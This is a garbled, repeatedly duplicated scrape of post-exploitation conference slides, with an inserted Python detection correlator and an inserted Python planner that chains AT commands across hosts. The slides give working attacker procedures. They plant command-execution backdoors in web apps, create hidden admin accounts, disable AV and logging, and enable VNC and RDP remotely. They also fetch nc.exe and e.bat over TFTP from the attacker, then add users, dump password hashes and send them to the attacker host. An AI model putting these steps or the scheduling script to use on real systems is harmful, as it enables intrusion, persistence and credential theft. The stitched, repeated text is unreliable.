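NETWORK_LOGON = 3   # logon type produced by net use \\target\ipc$


def parse_record(line):
    """Constructed layout: timestamp|host|event_id|account|logon_type|source_ip|detail"""
    ts, host, eid, account, ltype, src, detail = line.split('|', 6)
    return {'ts': datetime.fromisoformat(ts), 'host': host, 'event_id': int(eid),
            'account': account, 'logon_type': int(ltype) if ltype else None,
            'source_ip': src or None, 'detail': detail}


def correlate(lines, window=timedelta(minutes=5)):
    """One alert per task creation that follows a network logon by the same
    account on the same host within `window`; input may be unsorted."""
    records = sorted((parse_record(l) for l in lines if l.strip()),
                     key=lambda r: r['ts'])
    last_network_logon = {}   # (host, account) -> (timestamp, source_ip)
    alerts = []
    for r in records:
        key = (r['host'], r['account'])
        if r['event_id'] in LOGON_EVENTS and r['logon_type'] == NETWORK_LOGON:
            last_network_logon[key] = (r['ts'], r['source_ip'])
        elif r['event_id'] in TASK_CREATED_EVENTS and key in last_network_logon:
            logon_ts, src = last_network_logon[key]
            delay = r['ts'] - logon_ts
            if delay <= window:
                alerts.append({'host': r['host'], 'account': r['account'],
                               'source_ip': src, 'task': r['detail'],
                               'delay_s': int(delay.total_seconds())})
    return alerts


# Constructed sample records. WS01 shows the slide's flow; WS02 is a task
# created long after the logon; WS03 is an interactive (type 2) logon;
# SRV01 uses the NT 5.x IDs and arrives out of order.
SAMPLE_LOG = r"""
2008-08-07T11:58:02|WS01|4624|CORP\jsmith|3|10.0.0.25|
2008-08-07T11:58:40|WS01|4698|CORP\jsmith|||At1.job: tftp -i 10.0.0.25 GET e.bat
2008-08-07T11:59:10|WS01|4698|CORP\jsmith|||At2.job: e.bat
2008-08-07T12:10:00|WS02|4624|CORP\backup|3|10.0.0.5|
2008-08-07T12:40:00|WS02|4698|CORP\backup|||Nightly backup
2008-08-07T13:00:00|WS03|4624|CORP\alice|2||
2008-08-07T13:00:30|WS03|4698|CORP\alice|||Defrag
2008-08-07T14:01:00|SRV01|602|CORP\jsmith|||At1.job: e.bat
2008-08-07T14:00:00|SRV01|540|CORP\jsmith|3|10.0.0.25|
"""

if __name__ == '__main__':
    for a in correlate(SAMPLE_LOG.splitlines()):
        print(f"{a['host']} {a['account']} from {a['source_ip']}: "
              f"task {a['delay_s']}s after network logon: {a['task']}")
```

Only WS01 and SRV01 fire: the 30-minute gap on WS02 falls outside the window, and the WS03 logon is local.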

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use, re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – Establish netbios session credentials on a range of hosts
• MassWinenum – Enumerate Netbios information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts

Slide 66

• DEMOS

Slide 67

• Related talks you should see
  – Beyond EIP – The theoretical tool development end of things (spoonm & skape)
  – Security Implications of Windows Access Tokens (Luke Jennings)

Slide 68

• Acknowledgements
  – Thanks to:
    • All the people from the offensivecomputing, nologin, uninformed IRC and SILC channels
    • HD Moore especially, for support and mentorship
    • Danny Quist, krbklepto, Egypt, spoonm, skape
    • Luke Jennings for his awesome work

Slide 69

• Questions?
• Presentation available at www.offensivecomputing.net

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 21: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 21

Persistence

bull Leveraging existing persistent admin access

bull Nagios checksbull Attack Configuration Management

ndash Cfenginendash SMSndash Automated Patching Systems (ldquopatchrdquo

them with our trojans)bull GUIrsquos

bull Tool distribution

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly

bull Not just through existing toolsndash Stealth Persistence requirements

bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement

Slide 48

Feature Modification

bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)

bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)

bull Turning off or adding exceptions to security softwarendash Firewalls AV logging

bull Modifying Local Security Policies

Slide 49

Feature Modification

bull Enabling psexecndash Psexec was great awesome remote

shellcommand toolndash Everybody now disables clipbook which

psexec requires l4m3 ndash Lets re-enable it

Slide 50

Feature Modification

bull Enabling psexecbull Use the system control tool scexe

ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv

Slide 51

Feature Modification bull Enabling VNC (from command line)

ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder

bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll

ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo

Vncreg file contents

[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8

Slide 52

Feature Modification

bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app

bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI

bull SCADA systemsbull Security camerasbull Who knows what you might be up to

ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO

Slide 53

Feature Modification bull Enabling Remote Desktop remotely

ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini

[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =

ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account

Slide 54

Feature Modification bull Enabling Remote Desktop remotely

ndash Create another file named enable_tsregWindows Registry Editor Version 500

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000

ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

bull Oldschool techniques can get results on new problems

bull Remember this is POST exploitation so you already have some access

bull AT command schedules things to run on at a specified time and date

ndash Schedule service must be running

Slide 58

Abusing The Scheduler

bull Often these days certain features are disabled for security

ndash Clipbook shares enumerationbull Use AT to get around these problems

ndash Usually NOT disabled

Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe

Slide 59

Abusing The Scheduler

bull Often AT is still enabled while many other things you typically use are not

bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

bull Building a tool around AT ndash Flow

bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now

ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not

always ldquoquietrdquo or available

Slide 61

Abusing The Scheduler

bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and

BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

bull Automating techniques and tools for use against massive numbers of hosts

bull Goalsndash Penetrate as many systems as possible

with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack

Slide 65

Massive Automation

bull MassNetUse ndash Establish netbios session credentials on range of hosts

bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings

bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

bull Related talks you should seendash Beyond EIP ndash The theoretical tool

development end of things (spoonm amp skape)ndash Security Implications of Windows Access

Tokens (Luke Jennings)

Slide 68

bull Acknowledgementsndash Thanks to

bull All the people from offensivecomputing nologin uninformed IRC and SILC channels

bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work

Slide 69

bull Questions bull Presentation available at

wwwoffensivecomputingnet

  • Meta-Post Exploitation
  • Slide 2
  • Slide 3
  • Slide 4
  • Slide 5
  • Slide 6
  • Slide 7
  • Slide 8
  • Slide 9
  • Slide 10
  • Slide 11
  • Slide 12
  • Slide 13
  • Slide 14
  • Slide 15
  • Slide 16
  • Slide 17
  • Slide 18
  • Slide 19
  • Slide 20
  • Slide 21
  • Slide 22
  • Slide 23
  • Slide 24
  • Slide 25
  • Slide 26
  • Slide 27
  • Slide 28
  • Slide 29
  • Slide 30
  • Slide 31
  • Slide 32
  • Slide 33
  • Slide 34
  • Slide 35
  • Slide 36
  • Slide 37
  • Slide 38
  • Slide 39
  • Slide 40
  • Slide 41
  • Slide 42
  • Slide 43
  • Slide 44
  • Slide 45
  • Slide 46
  • Slide 47
  • Slide 48
  • Slide 49
  • Slide 50
  • Slide 51
  • Slide 52
  • Slide 53
  • Slide 54
  • Slide 55
  • Slide 56
  • Slide 57
  • Slide 58
  • Slide 59
  • Slide 60
  • Slide 61
  • Slide 62
  • Slide 63
  • Slide 64
  • Slide 65
  • Slide 66
  • Slide 67
  • Slide 68
  • Slide 69
Page 22: Meta-Post Exploitation...•Offensive Computing •Metasploit •cDc –Work: •Malware Analyst •Reverse Engineer •Penetration Tester •Exploit developer. Slide: 3 Colin Ames

Slide 22

Persistence

bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version

ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get

detected

Slide 23

Persistence

bull Add vulnerable codebull Example web apps

ndash Take out user input validationndash Inject your vulnerable code

bull Focus on vague intentbull Never be obviously and solely malicious

ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs

Slide 24

Persistence

bull More web app examplesbull Add hidden field to HTML form

ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt

bull Edit web app and tie vuln perl code to form field input

If defined $hidden_field open($filenamerdquogt$hidden_field)

bull Craft a POST including the hidden field

Slide 25

Persistence

bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected

ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period

bull No rootkits to installbull Tripwire probably wonrsquot see this

Slide 26

Persistence

bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form

fieldsndash If Name = John Smith and Age = 42 then execute

contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to

find

Slide 27

Persistence

bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation

Slide 28

Persistence

bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access

bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)

bull Only use AT to run your commandsbull Persistence without adding files new accounts

ndash Unlikely to be discovered

Slide 29

bull DEMOS

Slide 30

Stealth Evading Detection

Slide 31

Stealth Evading Detection

bull Hiding your activityndash From

bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing

Slide 32

Stealth Evading Detection

bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you

can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist

(helps persistence)ndash On a pen test you should also be testing the

organizations detection and response capabilities

Slide 33

Stealth Evading Detection

bull Goalsndash Keep system operable

bull If it breaks you canrsquot use itbull Someone will come fix it

ndash Operate without fear of detectionndash Robustness

bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS

Slide 34

Stealth Evading Detection

bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption

bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics

bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research

Slide 35

Stealth Evading Detection

bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight

bull Many tools have ONLY malicious usesbull Make your intent hard to determine

ndash Be noisy on one to divert attention from another

Slide 36

Stealth Evading Detection

bull Different Perspectivendash Know the targets environment better than

they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal

behavior

ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious

Slide 37

Stealth Evading Detection

bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs

Slide 38

bull DEMOSndash Kaspersky squeals like a pig

Slide 39

User Identity Theft

Slide 40

User Identity Theft

bull Itrsquos not always about ROOTbull Look like someone else

ndash Use the credentials access of another userbull Goals

ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior

Slide 41

User Identity Theft

bull Stages and techniquesndash Target users

bull Who has access to whatbull Where is the data

ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens

ndash Access is the end goal be it data or another system

Slide 42

User Identity Theft

bull Existing toolsndash Incognito (metasploit)

bull Enumerate hijack tokensndash FUFUTO

bull Enable SYSTEM privilegesbull Change process privileges DKOM

ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials

Slide 43

User Identity Theft

Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My

bull What we wantndash Privileges or SIDrsquos

bull What we getndash Access Access Access

bull How we get itndash Incognito vs FUto

Slide 44

bull DEMOS

Slide 45

Feature Modification

Slide 46

Feature Modification

bull Changing existing features or settings to benefit our activities

bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access

software

Slide 47

Feature Modification

• Feature modification is basically securable object manipulation
  – Remember all those tokens and security descriptors?
  – These can be modified programmatically and directly
• Not just through existing tools
  – Stealth / persistence requirements
• May make it more advantageous to use custom tools
  – Access objects programmatically
  – Can be much more complex to implement

Slide 48

Feature Modification

• Re-enabling disabled access
  – PsExec: it's still cool (thanks Mark)
• Enabling GUI access
  – VNC (from a command line)
  – Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
  – Firewalls, AV, logging
• Modifying local security policies

Slide 49

Feature Modification

• Enabling psexec
  – PsExec was a great, awesome remote shell / command tool
  – Everybody now disables ClipBook, which psexec requires. l4m3!
  – Let's re-enable it

Slide 50

Feature Modification

• Enabling psexec
• Use the service control tool, sc.exe
  – net use \\target\ipc$ password /user:username
  – sc \\target config netdde start= auto
  – sc \\target config netddedsdm start= auto
  – sc \\target config clipsrv start= auto
  – sc \\target start netdde
  – sc \\target start netddedsdm
  – sc \\target start clipsrv

Slide 51

Feature Modification

• Enabling VNC (from command line)
  – Go get VNC (check out guhnu)
  – Make a folder on the target for the VNC files
  – Copy the following files to the target folder:
    • winvnc.exe
    • vnc.reg
    • vnchooks.dll
    • omnithread_rt.dll
  – regedit /s vnc.reg
  – winvnc -install
  – net start "vnc server"
  – winvnc
  – Password is "infected"

vnc.reg file contents:

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8

(The Password value is the standard 8-byte VNC obfuscated form, DES under a fixed key that every VNC client carries, so anyone who can read this registry key can recover the plaintext password.)

Slide 52

Feature Modification

• Enabling Remote Desktop remotely
  – Having a GUI to your target can be necessary
  – Maybe they are running a specialized GUI app
    • Ex: system controlling access to security doors
      – No command-line way of modifying the system; need a GUI
    • SCADA systems
    • Security cameras
    • Who knows what you might be up to
  – Remote Desktop is fast and already a feature of the OS
  – However, it's often disabled, maybe even by GPO

Slide 53

Feature Modification

• Enabling Remote Desktop remotely
  – Complicated procedure, especially if GPOs are involved
  – Create a file named fix_ts_policy.ini:

[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
seremoteinteractivelogonright = hacked_account
seinteractivelogonright = hacked_account
sedenyinteractivelogonright =
sedenyremoteinteractivelogonright =
sedenynetworklogonright =

  – This file will fix the policy settings that are in your way
  – Change "hacked_account" to a real account

Slide 54

Feature Modification

• Enabling Remote Desktop remotely
  – Create another file named enable_ts.reg:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000

  – Then perform these commands:
    • sc config termservice start= auto
    • regedit /s enable_ts.reg
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\new.secedit.sdb
    • copy c:\windows\security\database\secedit.sdb c:\windows\security\database\orig.secedit.sdb
    • secedit /configure /db new.secedit.sdb /cfg fix_ts_policy.ini
    • gpupdate /force
    • net start "terminal services"

Slide 55

bull DEMOS

Slide 56

Abusing The Scheduler

Slide 57

Abusing The Scheduler

• Oldschool techniques can get results on new problems
• Remember, this is POST exploitation, so you already have some access
• The AT command schedules things to run at a specified time and date
  – The Schedule service must be running

Slide 58

Abusing The Scheduler

• Often these days certain features are disabled for security
  – ClipBook, shares, enumeration
• Use AT to get around these problems
  – Usually NOT disabled

net use \\target\ipc$ password /user:username
at \\target 12:00pm "command"
Ex: at \\192.168.1.1 12:00pm "tftp -i myip GET nc.exe"

Slide 59

Abusing The Scheduler

• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
  – Enable / start services
  – Transfer files
  – Add users
  – Mess with the registry, policies
  – Pretty much anything you can do with a shell
  – Added bonus: defaults to run as SYSTEM

Slide 60

Abusing The Scheduler

• Building a tool around AT – flow
  – Establish an authenticated session
  – Determine the time on the target
  – Pass commands to the target to be run 1 min from now
    • Write a batch file that executes everything at once
    • Have the target send you back whatever info you want
    • Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available

Slide 61

Abusing The Scheduler

• Common use example
  – net use \\target
  – net time \\target
  – at \\target (net time + 1 min) "tftp -i <us> GET e.bat"
  – at \\target (net time + 2 min) e.bat
  – e.bat does:
    • Adds a user (net user hacked hacked /add)
      – Admin group (net localgroup administrators hacked /add)
    • Gets hash-dumping tools and dumps hashes
    • Sends hashes, identified by IP, back to the attacker host
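The one piece of real logic in the AT flow above (slides 60 and 61) is turning the target's own clock, as reported by `net time \\target`, into the HH:MM arguments for a chain of `at` commands, which is also the per-host building block of an AtAbuse-style tool for a range of hosts (slide 65). The script below is an added example and not code from the talk or from its tools: it parses `net time` output, rounds up to AT's one-minute granularity, and emits the `at` lines, including the case where the schedule crosses midnight. The host addresses, the `net time` text in `SAMPLE_OUTPUT` and the staged commands are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Matches the time in "net time \\host" output, e.g.
#   Current time at \\192.168.1.1 is 3/12/2008 11:59 PM
# 24-hour output ("12/03/2008 23:59") from other locales is accepted too.
NET_TIME_RE = re.compile(
    r"\bis\s+(?P<date>\d{1,2}/\d{1,2}/\d{4})\s+"
    r"(?P<time>\d{1,2}:\d{2}(?::\d{2})?)\s*(?P<ampm>[AP]M)?", re.IGNORECASE)


def parse_net_time(output, dayfirst=False):
    """Return the target's clock as a datetime, parsed from 'net time' output."""
    m = NET_TIME_RE.search(output)
    if not m:
        raise ValueError("unrecognised 'net time' output: %r" % output)
    date_fmt = "%d/%m/%Y" if dayfirst else "%m/%d/%Y"
    time_fmt = "%H:%M:%S" if m.group("time").count(":") == 2 else "%H:%M"
    text = f"{m.group('date')} {m.group('time')}"
    if m.group("ampm"):
        time_fmt = time_fmt.replace("%H", "%I") + " %p"
        text += " " + m.group("ampm").upper()
    return datetime.strptime(text, f"{date_fmt} {time_fmt}")


def schedule_times(target_now, count, first_offset=1, step=1):
    """Pick one run time per command. AT has one-minute granularity, so the
    base is rounded up to the next whole minute when seconds were reported;
    otherwise "+1 min" could fire only seconds after the job is queued."""
    base = target_now.replace(second=0, microsecond=0)
    if target_now.second:
        base += timedelta(minutes=1)
    return [base + timedelta(minutes=first_offset + i * step) for i in range(count)]


def plan_at_commands(host, net_time_output, commands, first_offset=1, step=1):
    """Build the 'at \\\\host HH:MM "command"' lines for one target."""
    times = schedule_times(parse_net_time(net_time_output), len(commands), first_offset, step)
    # AT takes a 24-hour HH:MM; a time earlier than the target's current time
    # is scheduled for tomorrow, so a chain that crosses midnight still runs in order.
    return [f'at \\\\{host} {t.strftime("%H:%M")} "{cmd}"' for t, cmd in zip(times, commands)]


def plan_for_hosts(net_time_by_host, commands, **kw):
    """Same staged commands for a range of hosts, each against its own reported clock."""
    return {host: plan_at_commands(host, out, commands, **kw)
            for host, out in net_time_by_host.items()}


# Constructed 'net time' output for a would-be target; not captured from any real host.
SAMPLE_OUTPUT = ("Current time at \\\\192.168.1.1 is 3/12/2008 11:59 PM\n"
                 "The command completed successfully.\n")
# Constructed staging: fetch a batch file from our TFTP server, then run it.
STAGE = ["tftp -i 10.0.0.5 GET e.bat", "e.bat"]

if __name__ == "__main__":
    for line in plan_at_commands("192.168.1.1", SAMPLE_OUTPUT, STAGE):
        print(line)
```

The output lines are meant to be run from a cmd.exe that already holds the `net use \\target\ipc$` session; the jobs then run as SYSTEM on the target, as the slide says. On Windows 8 / Server 2012 and later `at.exe` only prints a deprecation notice, and the same flow is built on `schtasks /create /s host /sc once /st HH:MM /ru SYSTEM /tn name /tr command` instead.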

bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)

bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host

Slide 62

Abusing The Scheduler

• Privileges of LocalSystem that we care about
  – NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
  – SE_IMPERSONATE_NAME
  – SE_TCB_NAME
  – SE_DEBUG_NAME

Slide 63

Massive Automation

Slide 64

Massive Automation

• Automating techniques and tools for use against massive numbers of hosts
• Goals
  – Penetrate as many systems as possible with little interaction and in a short time
  – Ease of use / re-use
  – Lower cost of attack

Slide 65

Massive Automation

• MassNetUse – establish NetBIOS session credentials on a range of hosts
• MassWinenum – enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – use the scheduler as your "shell" to control ranges of hosts

Slide 66

bull DEMOS

Slide 67

• Related talks you should see
